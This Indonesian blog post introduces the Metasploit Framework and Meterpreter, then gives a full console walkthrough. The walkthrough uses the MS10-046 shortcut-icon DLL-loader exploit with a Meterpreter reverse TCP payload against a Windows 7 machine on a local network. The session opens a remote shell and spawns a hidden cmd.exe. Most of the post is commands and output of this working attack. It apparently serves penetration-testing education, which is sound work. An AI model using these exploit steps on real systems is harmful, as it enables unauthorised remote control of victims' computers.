METASPLOIT FRAMEWORK



ONEPOIN.COM - Metasploit Framework, MSF adalah kerangka, kumpulan program dan alat-alat untuk jaringan pengujian penetrasi. Metasploit memiliki koleksi eksploitasi, muatan, perpustakaan dan interface yang dapat digunakan untuk mengeksploitasi komputer.

Metasploit memiliki koleksi besar eksploitasi dan muatan dan alat untuk paket dan mengantarkan mereka ke komputer host yang ditargetkan. Metasploit memungkinkan Anda untuk memilih mengeksploitasi dari perpustakaan, pilih payload, mengkonfigurasi target menangani, nomor port target, dan pilihan lain, dan kerangka akan paket semua bersama-sama bersama-sama, dan meluncurkannya di seluruh jaringan ke sistem target. Metasploit adalah sangat fleksibel dan dapat membantu dalam pengujian dan pengembangan eksploitasi. Yang ditulis dalam bahasa pemrograman Ruby, Metasploit juga memungkinkan pengguna untuk menulis eksploitasi dan muatan sendiri dan memasukkan mereka dalam kerangka. Metasploit adalah cross platform dan dapat berjalan di Linux, MAC OS, dan Windows dan memiliki eksploitasi dan muatan menargetkan ketiga juga.

Meterpreter - Salah satu muatan lebih kuat adalah Metasploit Interpreter atau meterpreter. Meterpreter memungkinkan pengguna untuk memiliki akses baris perintah ke mesin target tanpa menjalankan proses cmd.exe, berjalan sepenuhnya di memori melalui proses dieksploitasi.



CONTOH 

Membalikkan Connection Dari target yang berjalan pada Windows 7:

Bugtraq@Ubuntu:/home/bugtraq$ sudo msfconsole
[sudo] password for bugtraq:
[*] Starting Metasploit Console...

 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


Love leveraging credentials? Check out bruteforcing

       =[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1339 exploits - 809 auxiliary - 228 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > show exploits

Exploits
========

   Name   Description                                                       Disclosure Date  Rank       
   ----                                                                            ---------------  ----       -----------
   aix/local/ibstat_path                                          2013-09-24       excellent  ibstat $PATH Privilege Escalation
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   android/browser/webview_addjavascriptinterface                 2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution
   android/fileformat/adobe_reader_pdf_js_interface               2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   apple_ios/browser/safari_libtiff                               2006-08-01       good       Apple iOS MobileSafari LibTIFF Buffer Overflow
   apple_ios/email/mobilemail_libtiff                             2006-08-01       good       Apple iOS MobileMail LibTIFF Buffer Overflow
   apple_ios/ssh/cydia_default_ssh                                2007-07-02       excellent  Apple iOS Default SSH Password Vulnerability
   bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow
   dialup/multi/login/manyargs                                    2001-12-12       good       System V Derived /bin/login Extraneous Arguments Buffer Overflow
   firefox/local/exec_shellcode                                   2014-03-10       normal     Firefox Exec Shellcode from Privileged Javascript Shell
   freebsd/ftp/proftp_telnet_iac                                  2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   freebsd/local/mmap                                             2013-06-18       great      FreeBSD 9 Address Space Manipulation Privilege Escalation
   freebsd/samba/trans2open                                       2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   freebsd/tacacs/xtacacsd_report                                 2008-01-08       average    XTACACSD report() Buffer Overflow
   freebsd/telnet/telnet_encrypt_keyid                            2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer
.............
msf > use windows/browser/ms10_046_shortcut_icon_dllloader


msf exploit(ms10_046_shortcut_icon_dllloader) > show payloads

Compatible Payloads
===================

   Name  Description                                           Disclosure Date  Rank    
   ----                                                                 ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/bind_tcp_rc4                                    normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_hop_http                                normal  Reflective DLL Injection, Reverse Hop HTTP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                 normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_tcp_rc4_dns                             normal  Reflective DLL Injection, Reverse TCP Stage

..................................
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.1.10     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.10
SRVHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.10:4444
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\192.168.1.10\nlyZM\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://192.168.1.10:80/
[*] Server started.
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 404 for /nlyZM/dEgPpgDCjZL.dll.2.Manifest ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/dEgPpgDCjZL.dll
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending DLL multistatus for /nlyZM/dEgPpgDCjZL.dll ...
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.40:52843) at 2015-10-09 16:42:57 +0530

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f cmd.exe -i -H
Process 4036 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::310c:8439:5772:51c8%11
   IPv4 Address. . . . . . . . . . . : 192.168.1.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::226:15ff:fe67:e6c3%11
                                       192.168.1.1


Subscribe to receive free email updates:

0 Response to "METASPLOIT FRAMEWORK"

Post a Comment